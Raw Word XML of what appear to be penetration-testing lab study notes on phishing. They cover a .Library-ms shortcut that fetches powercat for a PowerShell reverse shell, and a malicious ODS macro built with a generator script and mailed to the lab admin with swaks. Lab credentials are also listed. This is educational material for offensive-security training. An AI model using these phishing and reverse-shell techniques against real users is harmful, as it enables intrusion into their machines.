    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These should be accessible to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious shortcut or file that can execute your payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You created a .Library-ms file and a PowerShell reverse shell shortcut.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Convincing message body, realistic sender (maildmz), and proper formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No outbound firewall restrictions on victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim machine must be able to reach your Kali box on:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 8000 (to download powercat.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002730">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 4444 (for reverse shell connection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002731">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002732">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus: How to Know if You Can Repeat This Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002733">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To know if you can pull this off on another box:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002734">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for port 587 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open with AUTH LOGIN in banner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002735">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if you’ve recovered any valid SMTP creds from the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002736">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the victim can access your attacker infrastructure (http://&lt;your_ip&gt;:8000, WebDAV, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002737">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim must be likely to click or open the payload (requires GUI access like RDP, phishing email access, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002738">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002739">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="292" name="image282.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image282.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81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273A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gdu9g7wd60mb" w:id="344"/>
      <w:bookmarkEnd w:id="344"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webadv explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000273D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4229100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="472" name="image462.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image462.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81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273E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="261" name="image251.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image251.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81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73F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002740">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002741">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5ni37hc4eff" w:id="345"/>
      <w:bookmarkEnd w:id="345"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another phishing example (with malicious ODS file containing a macro for a reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002742">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002743">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the Hepet PG practice. There were 2 writeups I read, and they did it differently. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002744">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002745">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId818">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2746">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:hyperlink r:id="rId819">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tool to create malicious ODS containing a macro for a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mmg-ods.py windows 192.168.45.159 1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002748">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up python host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002749">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">swkas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to send mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server 192.168.134.149 --body “Please check this spreadsheet” --header “Subject: Please check this spreadsheet”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId820">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId821">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">original</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274D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used the LibreOffice GUI app in order to create ODS file with macro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then used a tool called "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sendemail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to send it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000274F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They didn't show the steps as clearly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002750">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002751">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002752">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aqx3k1hl133q" w:id="346"/>
      <w:bookmarkEnd w:id="346"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another phishing example (sending email with keywords and putting our http://&lt;IP&gt; in email)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002753">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002754">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7643813" cy="5157123"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="443" name="image436.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image436.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId822"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7643813" cy="5157123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002756">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message and it had a size of 683</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002757">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
